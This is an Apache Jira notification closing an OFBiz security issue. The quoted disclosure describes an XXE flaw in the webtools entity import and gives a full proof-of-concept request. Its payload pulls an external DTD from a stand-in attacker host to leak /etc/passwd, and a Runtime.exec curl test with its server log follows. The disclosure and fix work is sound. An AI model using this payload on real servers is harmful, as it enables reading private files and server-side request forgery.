[ https://issues.apache.org/jira/browse/OFBIZ-11197?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Jacques Le Roux closed OFBIZ-11197. ----------------------------------- Fix Version/s: 17.12.02 18.12.01 Assignee: Jacques Le Roux Resolution: Fixed This is fixed with OFBIZ-11470 > Arbitrary Code Execution > ------------------------ > > Key: OFBIZ-11197 > URL: https://issues.apache.org/jira/browse/OFBIZ-11197 > Project: OFBiz > Issue Type: Sub-task > Components: framework/webtools > Affects Versions: Trunk > Reporter: Jacques Le Roux > Assignee: Jacques Le Roux > Priority: Major > Fix For: 18.12.01, 17.12.02 > > > This was reported to the OFBiz security team by Jason Nordenstam from > offensive-security.com. We did not consider it as a real security issue > because it requires authentication. > {quote} > Authenticated users can import XML documents containing DTDs. The SAX parser > used by the XML Data Import functionality does not have DTD parsing > explicitly disabled which makes it vulnerable to XXE attacks. > The results of the import are not displayed in the page which means an > 'error-based' approach is needed to read local files. The parser will also > resolve external entities so this vulnerability can also be used for internal > port scanning or server-side request forgery. > Affected URL: > /webtools/control/entityImport > POC Example Request: > POST /webtools/control/entityImport HTTP/1.1 > Host:<host> > User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 > Firefox/60.0 > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 > Accept-Language: en-US,en;q=0.5 > Accept-Encoding: gzip, deflate > Referer: <host>/webtools/control/entityImport > Content-Type: application/x-www-form-urlencoded > Content-Length: 312 > Cookie: JSESSIONID=66A4289C95C78E5E7977EFF796A7D05B.jvm1; OFBiz.Visitor=10178 > Connection: close > Upgrade-Insecure-Requests: 1 > fulltext=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22utf-8%22%3F%3E%0D%0A%3C%21DOCTYPE+notfound+%5B%0D%0A+%3C%21ENTITY+%25+base+SYSTEM+%22http%3A%2F%2F<attacker_ip>%2Ferror.dtd%22%3E%0D%0A+%25base%3B%0D%0A+%25param1%3B+%0D%0A+%25external%3B%0D%0A%5D%3E%0D%0A%3Croot%3E%3Cfoo%3Ebar%3C%2Fbar%3E%3C%2Froot%3E%0D%0A > Payload One Decoded: > <?xml version="1.0" encoding="utf-8"?> > <!DOCTYPE notfound [ > <!ENTITY % base SYSTEM "http://<attacker_ip>/error.dtd"> > %base; > %param1; > %external; > ]> > <root><foo>bar</bar></root> > error.dtd on Attacking Machine: > <!ENTITY % payload SYSTEM "file:///etc/passwd"> > <!ENTITY % param1 "<!ENTITY % external SYSTEM 'file:///banana/%payload;'>" > > {quote} > Works using: > Runtime rt = Runtime.getRuntime(); > rt.exec("curl https://demo-trunk.ofbiz.apache.org:9090/pingtest"); > We get: > ofbizDemo@ofbiz-vm3:~$ python -m SimpleHTTPServer 9090 > Serving HTTP on 0.0.0.0 port 9090 ... > 172.31.43.132 - - [31/Aug/2019 07:37:00] code 400, message Bad request syntax > ("\x16\x03\x01\x02\x00\x01\x00\x01\xfc\x03\x03\x900q\xa3\xae > a\xc4\r\xb6eA\xd8\x0bv/\x13k\xce\x01Q\xd4\xd3\x87w\\I\xca\x8b~\xab\xa4 > 2Re|\xdc\xcb\x85p\x8f\x8e\xab\xee\x04*\xe7\xcb\xfd\xba\x0eu\x14z\x91\xedN\xbd\x91\xb3jy\xae\xc7\x00>\x13\x02\x13\x03\x13\x01\xc0,\xc00\x00\x9f\xcc\xa9\xcc\xa8\xcc\xaa\xc0+\xc0/\x00\x9e\xc0$\xc0(\x00k\xc0#\xc0'\x00g\xc0") > ¦eA¦31.43.132 - - [31/Aug/2019 07:37:00] "¦¦0q¦¦ a¦ > v/k¦Q¦?w\I?~¦¦ 2Re|¦?p¦¦¦¦*¦¦¦uz¦¦N¦¦¦jy¦¦>¦,¦0¦???¦+¦/¦¦$¦(k¦#¦'g¦" 400 - > Not sure what we can really do with that on OFBiz server side, but clearly > something happens -- This message was sent by Atlassian Jira (v8.3.4#803005)